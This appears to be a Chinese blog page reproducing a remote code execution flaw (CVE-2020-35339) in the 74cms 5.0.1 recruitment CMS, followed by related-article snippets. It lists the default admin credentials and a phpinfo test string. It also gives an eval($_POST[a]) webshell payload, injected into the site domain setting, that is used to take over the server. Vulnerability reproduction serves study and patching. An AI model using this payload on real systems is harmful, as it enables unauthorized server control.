骑士cms任意代码执行
漏洞描述:
迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。
74cms version 5.0.1 存在安全漏洞,该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common functions.php存在远程代码执行漏洞,攻击者可利用该漏洞可以获得服务器权限并控制服务器。
漏洞利用条件:
/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程代码执行
漏洞影响范围:
74cms version 5.0.1
漏洞复现:
- /index.php?m=Admin 访问后台,adminadmin/adminadmin登录后台:
2.在网站域名中填写/.',phpinfo(),'/.com然后保存,刷新当前页面,返回phpinfo页面:
3.Getshell:在网站域名输入/.',eval($_POST[a]),'/.com,保存刷新:
4.连接木马:
修复建议:
1.关注厂商,升级版本
骑士cms任意代码执行相关推荐
- 骑士cms任意代码执行(CVE-2020-35339)
本文章仅供学习使用,如用作非法用途,概不负责 0x01 漏洞介绍 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年正式推出.为 ...
- vulfocus——骑士cms任意代码执行(CVE-2020-35339)
描述 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统. 后台账号密码均为adminadmin 复现 1.打开web页面 2.找到后台登陆界面 ip:port/i ...
- 记一次海洋cms任意代码执行漏洞拿shell(url一句话)
实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...
- php里pluck,Pluck CMS后台另两处任意代码执行
前言 本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下. 但是审完第一个后发现已经有两位同学写出来了 当时自己的思路跟第一个同学一样,第二个同学的思路自己确实没 ...
- 74cms 任意代码执行(CVE-2020-35339)
74cms 任意代码执行(CVE-2020-35339) 0x01 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年 ...
- php 168任意代码执行漏洞之php的Complex (curly) syntax
今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...
- Android Adobe Reader 任意代码执行分析(附POC)
livers · 2014/04/18 14:05 0x00 描述 前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞. 漏洞编号: CVE: 2014-05 ...
- ecshop 2.x/3.x sql注入/任意代码执行漏洞
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中di ...
- nginx php 配置请求等待时间_CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞预警...
0x01 前言 2019年10月23日,PHP官方发布了在 nginx 配置不当的情况下 php-fpm 可导致远程代码执行的漏洞. 但由于是配置文件的开放性,还请使用 nginx+php-fpm 的 ...
最新文章
- Hive SQL 监控系统 - Hive Falcon
- 【linux】lsof的常用命令汇总
- java kryo_kryo序列化 - Java序列化期间的错误
- WAMP_DEDE兼容配置
- Redis介绍及常用应用场景介绍
- Android动态加载插件APK
- PyTorch的13个必知必会知识点
- LeetCode#70 Climbing Stairs
- 计算机屏幕亮度一般为多少,笔记本显示器的亮度一般设置为多少?
- Mac - 如何安全地还原 Mac 的默认字体
- 双目测距(一)--图像获取与单目标定
- VS2015 社区版下载
- 【区块链开发】区块链技术的电商平台开发
- 【复盘】如何打造自己的研发能力
- SQL 查询的分布式执行与调度
- 二维码解码器Zbar+VS2010开发环境配置(使用opencv库)
- 服务器””上的 MSDTC 不可用。解决办法
- 初试 Ceph 存储之块设备、文件系统、对象存储
- 数据结构——一元多项式相加(C语言版本)
- keil查找函数引用的方法
热门文章
- 透明图片怎么发给别人_如何在网上 1 分钟就搜到高清优质图片?这 3 个搜图网站一定要收藏好...
- 记录一次jar文件在windows系统下开机自启
- c语言链表删除重复点,【图片】想问一道链表题,如何删除重复元素【c语言吧】_百度贴吧...
- xp找不到局域网内其它计算机,在W10局域网内找不到其它共享电脑的解决方案
- 高德地图实现逻辑及代码
- java 判断用户名_java如何判断用户名和密码
- 前段JavaScript学习---狂神说java笔记
- 人工智能就业前景如何?
- 苹果工具条_苹果iOS 13.4 Beta 1来袭:网友直接吐槽0创新
- 如何用C#+WinRAR 实现压缩